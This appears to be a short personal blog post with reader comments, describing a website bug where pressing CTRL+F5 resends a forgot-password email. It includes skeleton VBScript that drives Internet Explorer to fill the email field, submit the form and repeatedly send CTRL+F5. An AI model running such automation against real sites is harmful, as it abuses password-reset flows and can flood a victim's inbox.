Subscribe to Software Autopsy        RSS Feed
-----

First trial - Code to exploit a bug in webpage

Icon 3 Comments
I was testing a web site and found a bug, when I press CTRL+F5, it performs a previous action, say if I click submit button for forgot password, which sends a temporary password. After the confirmation that a temporary password is send to the email,I press CTRL+F5 and repeats sends the reset password again.

This is just a ameature stuff, nothing greak for the geeks on the website. This code worked in the machine where I tested it. I enhanced it a lot more, but I just posting the skeleton code.

Dim URL
Dim IE
Dim objcheck
Dim objbutton

Set IE = CreateObject("internetexplorer.application")
URL = "the url you want to use"
IE.Visible = True
IE.Navigate URL
x = 1
While x < 10000
x = x + 1
Wend

objcheck = IE.document.getElementsByName("controlname") ' This is for email
objcheck.Focus
objcheck.Value = "emailaddress"
Set objbutton = IE.document.getElementsByTagName("contorlname")


For Each btns In objbutton
If btns.Type = "submit" Then
btns.Click

objcheck = IE.document.getElementsByName("controlname")
objcheck.Focus

x = 1
While x < 10000
x = x + 1
wend

Set WshShell = CreateObject("WScript.Shell")
WshShell.SendKeys "^{F5}"
End If
Next


3 Comments On This Entry

Page 1 of 1

modi123_1 Icon

24 October 2016 - 06:43 AM
Did you fix your website's bug then?
0

AnandVVN Icon

12 December 2016 - 05:04 AM
No unfortunately they didn't fix the bug till date
0

AnandVVN Icon

17 May 2017 - 12:38 AM
I found its going live, good luck for them
0
Page 1 of 1

October 2017

S M T W T F S
1234567
891011121314
1516 17 18192021
22232425262728
293031    

0 user(s) viewing

0 Guests
0 member(s)
0 anonymous member(s)

Recent Entries

Search My Blog